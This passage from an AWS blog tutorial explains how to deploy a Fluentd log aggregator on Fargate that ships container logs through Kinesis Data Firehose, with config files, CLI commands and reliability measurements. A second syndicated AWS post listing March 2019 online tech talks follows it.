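  --scalable-dimension ecs:service:DesiredCount \
  --policy-type TargetTrackingScaling \
  --target-tracking-scaling-policy-configuration \
    '{"TargetValue": 60.0, "PredefinedMetricSpecification": {"PredefinedMetricType": "ECSServiceAverageCPUUtilization"}}'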

Performance of a single aggregator task

Keep in mind that this data does not represent a guarantee, as your performance may differ. I recommend performing real-world testing using logs from your applications so that you can tune Fluentd to your specific needs.

As a warning, one thing to watch out for is messages in the Fluentd logs that mention retry counts:

2018-10-24 19:26:54 +0000 [warn]: #0 [output_kinesis_frontend] Retrying to request batch. Retry count: 1, Retry records: 250, Wait seconds 0.35
2018-10-24 19:26:54 +0000 [warn]: #0 [output_kinesis_frontend] Retrying to request batch. Retry count: 2, Retry records: 125, Wait seconds 0.27
2018-10-24 19:26:57 +0000 [warn]: #0 [output_kinesis_frontend] Retrying to request batch. Retry count: 1, Retry records: 250, Wait seconds 0.30

In my experience, these warnings always came up whenever I was hitting Kinesis Data Firehose API limits. Fluentd can accept high volumes of log traffic, but if it runs into Kinesis Data Firehose limits, then the data is buffered in memory.

If this state persists for a long time, data is eventually lost when the buffer reaches its max size. To prevent this problem, either increase the number of Kinesis Data Firehose delivery streams in use or request a Kinesis Data Firehose limit increase.

Aggregator reliability

In normal use, I didn’t see any dropped or duplicated log messages. A small amount of log data loss occurred when tasks in the service were stopped. This happened when the service was scaling down, and during deployments to update the Fluentd configuration.

When a task is stopped, it is sent SIGTERM, and then after a 30-second timeout, SIGKILL. When Fluentd receives the SIGTERM, it makes a single attempt to send all logs held in its in-memory buffer to their destinations. If this single attempt fails, the logs are lost. Therefore, log loss can be minimized by over-provisioning the aggregator, which reduces the amount of data buffered by each aggregator task.

Also, it is important to stay well within your Kinesis Data Firehose API limits. That way, Fluentd has the best chance of sending all the data to Kinesis Data Firehose during that single attempt.

To test the reliability of the aggregator, I used applications hosted on ECS that created several megabytes per second of log traffic. These applications inserted special ‘tracer’ messages into their normal log output. By querying for these tracer messages at the log storage destination, I was able to determine how many messages were lost or duplicated.

These tracer logs were produced at a rate of 18 messages per second. During a deployment to the aggregator service (which stops all the existing tasks after starting new ones), 2.67 tracer messages were lost on average, and 11.7 messages were duplicated.

There are multiple ways to think about this data. If I ran one deployment during an hour, then 0.004% of my log data would be lost during that period, making the aggregator 99.996% reliable. In my experience, stopping a task only causes log loss during a short time slice of about 10 seconds.

Here’s another way to look at this. Every time that a task in my service was stopped (either due to a deployment or the service scaling in), only 1.5% of the logs received by that task in the 10-second period were lost on average.

As you can see, the aggregator is not perfect, but it is fairly reliable. Remember that logs were only dropped when aggregator tasks were stopped. In all other cases, I never saw any log loss. Thus, the aggregator provides a sufficient reliability guarantee that it can be trusted to handle the logs of many production workloads.

Deploying the aggregator

Here’s how to deploy the log aggregator in your own VPC.

1. Create the Kinesis Data Firehose delivery streams.
2. Create a VPC and network resources.
3. Configure Fluentd.
4. Build the Fluentd Docker image.
5. Deploy the Fluentd aggregator on Fargate.
6. Configure ECS tasks to send logs to the aggregator.

Create the Kinesis Data Firehose delivery streams

For the purposes of this post, assume that you have already created an Elasticsearch domain and S3 bucket that can be used as destinations.

Create a delivery stream that sends to Amazon ES, with the following options:

  • For Delivery stream name, type “elasticsearch-delivery-stream.”
  • For Source, choose Direct Put or other sources.
  • For Record transformation and Record format conversion, enable these options if you need to change the format of your log data before it is sent to Amazon ES.
  • For Destination, choose Amazon Elasticsearch Service.
  • If needed, enable S3 backup of records.
  • For IAM Role, choose Create new or navigate to the Kinesis Data Firehose IAM role creation wizard.
  • For the IAM policy, remove any statements that do not apply to your delivery stream.

All records sent through this stream are indexed under the same Elasticsearch type, so it’s important that all of the log records be in the same format. Fortunately, Fluentd makes this easy. For more information, see the Configure Fluentd section in this post.

Follow the same steps to create the delivery stream that sends to S3. Call this stream “s3-delivery-stream,” and select your S3 bucket as the destination.
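Both delivery streams can also be created from the CLI. The example below sketches the S3 stream only, with a placeholder bucket and IAM role ARN; the buffering and compression values are reasonable defaults rather than required settings.

aws firehose create-delivery-stream \
  --delivery-stream-name s3-delivery-stream \
  --delivery-stream-type DirectPut \
  --extended-s3-destination-configuration '{
    "RoleARN": "arn:aws:iam::123456789012:role/firehose-delivery-role",
    "BucketARN": "arn:aws:s3:::my-backend-logs-bucket",
    "Prefix": "backend-logs/",
    "BufferingHints": {"SizeInMBs": 5, "IntervalInSeconds": 60},
    "CompressionFormat": "GZIP"
  }'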

Create a VPC and network resources

Download the ecs-refarch-cloudformation/infrastructure/vpc.yaml AWS CloudFormation template from GitHub. This template specifies a VPC with two public and two private subnets spread across two Availability Zones. The Fluentd aggregator runs in the private subnets, along with any other services that should not be accessible outside the VPC. Your backend services would likely run here as well.

The template configures a NAT gateway that allows services in the private subnets to make calls to endpoints on the internet. It allows one-way communication out of the VPC, but blocks incoming traffic. This is important. While the aggregator service should only be accessible in your VPC, it does need to make calls to the Kinesis Data Firehose API endpoint, which lives outside of your VPC.

Deploy the template with the following command:

aws cloudformation deploy --template-file vpc.yaml \
--stack-name vpc-with-nat \
--parameter-overrides EnvironmentName=aggregator-service-infrastructure

Configure Fluentd

The Fluentd aggregator collects logs from other services in your VPC. Assuming that all these services are running in Docker containers that use the Fluentd docker log driver, each log event collected by the aggregator is in the format of the following example:

{
"source": "stdout",
"log": "122.116.50.70 - Corwin8644 264 [2018-10-31T21:31:59Z] \"POST /activate\" 200 19886",
"container_id": "6d33ade920a96179205e01c3a17d6e7f3eb98f0d5bb2b494383250220e7f443c",
"container_name": "/ecs-service-2-apache-d492a08f9480c2fcca01"
}

This log event is from an Apache server running in a container on ECS. The line that the server logged is captured in the log field, while source, container_id, and container_name are metadata added by the Fluentd Docker logging driver.

As I mentioned earlier, all log events sent to Amazon ES from the delivery stream must be in the same format. Furthermore, the log events must be JSON-formatted so that they can be converted into an Elasticsearch type. The Fluentd Docker logging driver satisfies both of these requirements.

If you have applications that emit Fluentd logs in different formats, then you could use a Lambda function in the delivery stream to transform all of the log records into a common format.

Alternatively, you could have a different delivery stream for each application type and log format and each log format could correspond to a different type in the Amazon ES domain. For simplicity, this post assumes that all of the frontend and backend services run on ECS and use the Fluentd Docker logging driver.

Now create the Fluentd configuration file, fluent.conf:

<system>
workers 4
</system>

<source>
@type  forward
@id    input1
@label @mainstream
port  24224
</source>

# Used for docker health check
<source>
@type http
port 8888
bind 0.0.0.0
</source>

# records sent for health checking won't be forwarded anywhere
<match health*>
@type null
</match>

<label @mainstream>
<match frontend*>
@type kinesis_firehose
@id   output_kinesis_frontend
region us-west-2
delivery_stream_name elasticsearch-delivery-stream
<buffer>
flush_interval 1
chunk_limit_size 1m
flush_thread_interval 0.1
flush_thread_burst_interval 0.01
flush_thread_count 15
total_limit_size 2GB
</buffer>
</match>
<match backend*>
@type kinesis_firehose
@id   output_kinesis_backend
region us-west-2
delivery_stream_name s3-delivery-stream
<buffer>
flush_interval 1
chunk_limit_size 1m
flush_thread_interval 0.1
flush_thread_burst_interval 0.01
flush_thread_count 15
total_limit_size 2GB
</buffer>
</match>
</label>

This file can also be found here, along with all of the code for this post. The first three lines tell Fluentd to use four workers, which means that it can use up to four CPU cores. You later configure each Fargate task with four vCPUs to match. The rest of the configuration defines sources and destinations for the logs processed by the aggregator.

The first source listed is the main source. All of the applications in the VPC forward logs to Fluentd using this source definition, which tells Fluentd to listen on port 24224. Logs are streamed to this port over TCP connections.

The second source is the http Fluentd plugin, listening on port 8888. This plugin accepts logs over HTTP, but it is only used for container health checks. Because Fluentd lacks a built-in health check, I’ve created a container health check that sends log messages via curl to the http plugin. The rationale is that if Fluentd can accept log messages, it must be healthy. Here is the command used for the container health check:

curl http://localhost:8888/healthcheck?json=%7B%22log%22%3A+%22health+check%22%7D || exit 1

The query parameter in the URL defines a URL-encoded JSON object that looks like this:

{"log": "health check"}

The container health check sends a log message of “health check”. While the query parameter in the URL defines the log message, the path, /healthcheck, sets the tag for the log message. In Fluentd, log messages are tagged, which allows them to be routed to different destinations.

In this case, the tag is healthcheck. As you can see in the configuration file, the first <match> definition handles logs whose tags match the pattern health*. Each <match> element defines a tag pattern and a destination for logs with matching tags. For the health check logs, the destination is null, because you do not want to store these dummy logs anywhere.

The Configure ECS tasks to send logs to the aggregator section of this post explains how log tags are defined with the Fluentd Docker logging driver. The other <match> elements process logs for the applications in the VPC and send them to Kinesis Data Firehose.

One of them matches any log tag that begins with “frontend”, and the other matches any tag that starts with “backend”. Each sends to a different delivery stream, so your frontend and backend services can tag their logs and have them delivered to different destinations.

Fluentd lacks built-in support for Kinesis Data Firehose, so use an open source plugin maintained by AWS: awslabs/aws-fluent-plugin-kinesis.
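The plugin is distributed as a Ruby gem, so adding it to a custom Fluentd image is a single command (the Dockerfile in the Build the Fluentd Docker image section installs it for you):

# Install the Kinesis output plugin, which provides the kinesis_firehose output type.
fluent-gem install fluent-plugin-kinesis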

Finally, each of the Kinesis Data Firehose <match> elements defines buffer settings with the <buffer> element. The Kinesis output plugin buffers data in memory if needed. These settings have been tuned to increase throughput and minimize the chance of data loss, but you should adjust them based on your own testing. For a discussion of the throughput and performance of this setup, see the Aggregator performance and throughput section in this post.

Build the Fluentd Docker image

Download the Dockerfile, and place it in the same directory as the fluent.conf file discussed earlier. The Dockerfile starts from the latest Alpine-based Fluentd image and installs awslabs/aws-fluent-plugin-kinesis and curl (for the container health check discussed earlier).

In the same directory, create an empty directory named plugins. The directory is left empty but is required when building the Fluentd Docker image. For more information about building custom Fluentd Docker images, see the Fluentd page on Docker Hub.

Build and tag the image:

docker build -t custom-fluentd:latest .

Push the image to an ECR repository so that it can be used in the Fargate service.
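A minimal sketch of that push follows, assuming a repository named custom-fluentd, a placeholder account ID of 123456789012, and the us-west-2 Region; substitute your own values (the get-login-password command requires a recent version of the AWS CLI):

# Create the repository (one time only).
aws ecr create-repository --repository-name custom-fluentd --region us-west-2

# Authenticate Docker to the registry, then tag and push the image.
aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-west-2.amazonaws.com
docker tag custom-fluentd:latest 123456789012.dkr.ecr.us-west-2.amazonaws.com/custom-fluentd:latest
docker push 123456789012.dkr.ecr.us-west-2.amazonaws.com/custom-fluentd:latest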

Deploy the Fluentd aggregator on Fargate

Download the CloudFormation template, which defines all the resources needed for the aggregator service. This includes the Network Load Balancer, target group, security group, and task definition.

First, create a cluster:

aws ecs create-cluster --cluster-name fargate-fluentd-tutorial

Second, create an Amazon ECS task execution IAM role. This role allows the Fargate tasks to pull the Fluentd container image from ECR and to write their own logs to Amazon CloudWatch. This is important: Fluentd can’t manage its own logs, because that would be a circular dependency.
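If you don’t already have such a role, the following sketch creates one with the AWS CLI; the role name fluentd-task-execution-role is an arbitrary placeholder, and its ARN is what you pass to the template below:

# Create the role with a trust policy that lets ECS tasks assume it.
aws iam create-role \
--role-name fluentd-task-execution-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'

# Attach the managed policy that grants ECR pull and CloudWatch Logs permissions.
aws iam attach-role-policy \
--role-name fluentd-task-execution-role \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy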

The template can then be launched into the VPC and private subnets created earlier. Add the required information as parameters:

aws cloudformation deploy --template-file template.yml --stack-name aggregator-service \
--parameter-overrides EnvironmentName=fluentd-aggregator-service \
DockerImage=<Repository URI used for the image built in Step 4> \
VPC=<your VPC ID> \
Subnets=<private subnet 1, private subnet 2> \
Cluster=fargate-fluentd-tutorial \
ExecutionRoleArn=<your task execution IAM role ARN> \
MinTasks=2 \
MaxTasks=4 \
--capabilities CAPABILITY_NAMED_IAM

MinTasks is set to 2, and MaxTasks is set to 4, which means that the aggregator always has at least two tasks.

When load increases, the service can dynamically scale out to as many as four tasks. Recall the discussion in the Aggregator performance and throughput section, and set these values based on your own expected log throughput.
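If you later want to change these bounds without redeploying the stack, and assuming the template registers the service’s DesiredCount with Application Auto Scaling, you can update the scalable target directly. The cluster and service names in the resource ID below are placeholders for your own:

# Raise the task ceiling for the aggregator service to six (placeholder resource ID).
aws application-autoscaling register-scalable-target \
--service-namespace ecs \
--scalable-dimension ecs:service:DesiredCount \
--resource-id service/fargate-fluentd-tutorial/fluentd-aggregator-service \
--min-capacity 2 \
--max-capacity 6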

Configure ECS tasks to send logs to the aggregator

First, get the DNS name of the load balancer created by the CloudFormation template. In the EC2 console, choose Load Balancers. The load balancer’s name matches the EnvironmentName parameter; in this case, it is fluentd-aggregator-service.
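You can also look up the DNS name from the command line. The following sketch assumes the load balancer name matches the EnvironmentName value used earlier:

# Retrieve the DNS name of the aggregator's Network Load Balancer.
aws elbv2 describe-load-balancers \
--names fluentd-aggregator-service \
--query 'LoadBalancers[0].DNSName' \
--output text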

Create a container definition for a container that logs to the Fluentd aggregator by adding the appropriate values for logConfiguration. In the following example, replace the fluentd-address value with the DNS name for your own load balancer. Ensure that you add :24224 after the DNS name; the aggregator listens on TCP port 24224.

"logConfiguration": {
    "logDriver": "fluentd",
    "options": {
        "fluentd-address": "fluentd-aggregator-service-cfe858972373a176.elb.us-west-2.amazonaws.com:24224",
        "tag": "frontend-apache"
    }
}

Notice the tag value, frontend-apache. This is how the tag discussed earlier is set. This tag matches the pattern frontend*, so the Fluentd aggregator sends it to the delivery stream for “frontend” logs.
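The same log driver options work for containers running outside of ECS, which is handy for testing the routing end to end. The following sketch uses a hypothetical backend-worker image and the example load balancer DNS name from above; because the tag backend-worker matches the backend* pattern, these logs land in the S3 delivery stream:

# Run a container whose stdout/stderr is shipped to the aggregator and tagged backend-worker.
docker run -d \
--log-driver fluentd \
--log-opt fluentd-address=fluentd-aggregator-service-cfe858972373a176.elb.us-west-2.amazonaws.com:24224 \
--log-opt tag=backend-worker \
backend-worker:latest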

Finally, your container instances need the following user data to enable the Fluentd log driver in the ECS agent:

#!/bin/bash
echo "ECS_AVAILABLE_LOGGING_DRIVERS=[\"awslogs\",\"fluentd\"]" >> /etc/ecs/ecs.config

Conclusion

In this post, I showed you how to build a log aggregator using AWS Fargate, Amazon Kinesis Data Firehose, and Fluentd.

To learn how to use the aggregator with applications that do not run on ECS, I recommend reading All Data Are Belong to AWS: Streaming upload via Fluentd from Kiyoto Tamura, a maintainer of Fluentd.

Learn about AWS Services & Solutions – March AWS Online Tech Talks

Post Syndicated from Robin Park original https://aws.amazon.com/blogs/aws/learn-about-aws-services-solutions-march-aws-online-tech-talks/

AWS Tech Talks

Join us this March to learn about AWS services and solutions. The AWS Online Tech Talks are live, online presentations that cover a broad range of topics at varying technical levels. These tech talks, led by AWS solutions architects and engineers, feature technical deep dives, live demonstrations, customer examples, and Q&A with AWS experts. Register now!

Note – All sessions are free and in Pacific Time.

Tech talks this month:

Compute

March 26, 2019 | 11:00 AM – 12:00 PM PT – Technical Deep Dive: Running Amazon EC2 Workloads at Scale – Learn how you can optimize your workloads running on Amazon EC2 for cost and performance, all while handling peak demand.

March 27, 2019 | 9:00 AM – 10:00 AM PT – Introduction to AWS Outposts – Learn how you can run AWS infrastructure on-premises with AWS Outposts for a truly consistent hybrid experience.

March 28, 2019 | 1:00 PM – 2:00 PM PT – Deep Dive on OpenMPI and Elastic Fabric Adapter (EFA) – Learn how to run tightly coupled HPC workloads on Amazon EC2 using Open MPI and the Elastic Fabric Adapter (EFA) network interface.

Containers

March 21, 2019 | 11:00 AM – 12:00 PM PT – Running Kubernetes with Amazon EKS – Learn how to run Kubernetes on AWS with Amazon EKS.

March 22, 2019 | 9:00 AM – 10:00 AM PT – Deep Dive Into Container Networking – Dive deep into microservices networking and how you can build, secure, and manage the communications into, out of, and between the various microservices that make up your application.

Data Lakes & Analytics

March 19, 2019 | 9:00 AM – 10:00 AM PT – Fuzzy Matching and Deduplicating Data with ML Transforms for AWS Lake Formation – Learn how to use ML Transforms for AWS Glue to link and de-duplicate matching records.

March 20, 2019 | 9:00 AM – 10:00 AM PT – Customer Showcase: Perform Real-time ETL from IoT Devices into your Data Lake with Amazon Kinesis – Learn best practices for how to perform real-time extract-transform-load into your data lake with Amazon Kinesis.

March 20, 2019 | 11:00 AM – 12:00 PM PT – Machine Learning Powered Business Intelligence with Amazon QuickSight – Learn how Amazon QuickSight leverages powerful ML and natural language capabilities to generate insights that help you discover the story behind the numbers.

Databases

March 18, 2019 | 9:00 AM – 10:00 AM PT – What’s New in PostgreSQL 11 – Find out what’s new in PostgreSQL 11, the latest major version of the popular open source database, and learn about AWS services for running highly available PostgreSQL databases in the cloud.

March 19, 2019 | 1:00 PM – 2:00 PM PT – Introduction on Migrating your Oracle/SQL Server Databases over to the Cloud using AWS’s New Workload Qualification Framework – Get an introduction on how AWS’s Workload Qualification Framework can help you with your application and database migrations.

March 20, 2019 | 1:00 PM – 2:00 PM PT – What’s New in MySQL 8 – Find out what’s new in MySQL 8, the latest major version of the world’s most popular open source database, and learn about AWS services for running highly available MySQL databases in the cloud.

March 21, 2019 | 9:00 AM – 10:00 AM PT – Building Scalable & Reliable Enterprise Apps with AWS Relational Databases – Learn how AWS Relational Databases can help you build scalable & reliable enterprise apps.

DevOps

March 19, 2019 | 11:00 AM – 12:00 PM PT – Introduction to Amazon Corretto: A No-Cost Distribution of OpenJDK – Learn about Amazon Corretto, a no-cost, multiplatform, production-ready distribution of OpenJDK.

End-User Computing

March 28, 2019 | 9:00 AM – 10:00 AM PT – Fireside Chat: Enabling Today’s Workforce with Cloud Desktops – Join a fireside chat about how cloud desktop solutions such as Amazon WorkSpaces can enable today’s workforce.

Enterprise

March 26, 2019 | 1:00 PM – 2:00 PM PT – Speed Your Cloud Computing Journey With the Customer Enablement Services of AWS: ProServe, AMS, and Support – Learn how to accelerate your cloud journey with AWS’s Customer Enablement Services.

IoT

March 26, 2019 | 9:00 AM – 10:00 AM PT – How to Deploy AWS IoT Greengrass Using Docker Containers and Ubuntu-snap – Learn how to bring cloud services to the edge using containerized microservices by deploying AWS IoT Greengrass to your device using Docker containers and Ubuntu snaps.

Machine Learning

March 18, 2019 | 1:00 PM – 2:00 PM PT – Orchestrate Machine Learning Workflows with Amazon SageMaker and AWS Step Functions – Learn about how ML workflows can be orchestrated with the rich features of Amazon SageMaker and AWS Step Functions.

March 21, 2019 | 1:00 PM – 2:00 PM PT – Extract Text and Data from Any Document with No Prior ML Experience – Learn how to extract text and data from any document with no prior machine learning experience.

March 22, 2019 | 11:00 AM – 12:00 PM PT – Build Forecasts and Individualized Recommendations with AI – Learn how you can build accurate forecasts and individualized recommendation systems using our new AI services, Amazon Forecast and Amazon Personalize.

Management Tools

March 29, 2019 | 9:00 AM – 10:00 AM PT – Deep Dive on Inventory Management and Configuration Compliance in AWS – Learn how AWS helps with effective inventory management and configuration compliance management of your cloud resources.

Networking & Content Delivery

March 25, 2019 | 1:00 PM – 2:00 PM PT – Application Acceleration and Protection with Amazon CloudFront, AWS WAF, and AWS Shield – Learn how to secure and accelerate your applications using AWS’s Edge services in this demo-driven tech talk.

Robotics

March 28, 2019 | 11:00 AM – 12:00 PM PT – Build a Robot Application with AWS RoboMaker – Learn how to improve your robotics application development lifecycle with AWS RoboMaker.

Security, Identity, & Compliance

March 27, 2019 | 11:00 AM – 12:00 PM PT – Remediating Amazon GuardDuty and AWS Security Hub Findings – Learn how to build and implement remediation automations for Amazon GuardDuty and AWS Security Hub.

March 27, 2019 | 1:00 PM – 2:00 PM PT – Scaling Accounts and Permissions Management – Learn how to scale your accounts and permissions management efficiently as you continue to move your workloads to AWS Cloud.

Serverless

March 18, 2019 | 11:00 AM – 12:00 PM PT – Testing and Deployment Best Practices for AWS Lambda-Based Applications – Learn best practices for testing and deploying AWS Lambda based applications.

Storage

March 25, 2019 | 11:00 AM – 12:00 PM PT – Introducing a New Cost-Optimized Storage Class for Amazon EFS – Come learn how the new Amazon EFS storage class and Lifecycle Management automatically reduces cost by up to 85% for infrequently accessed files.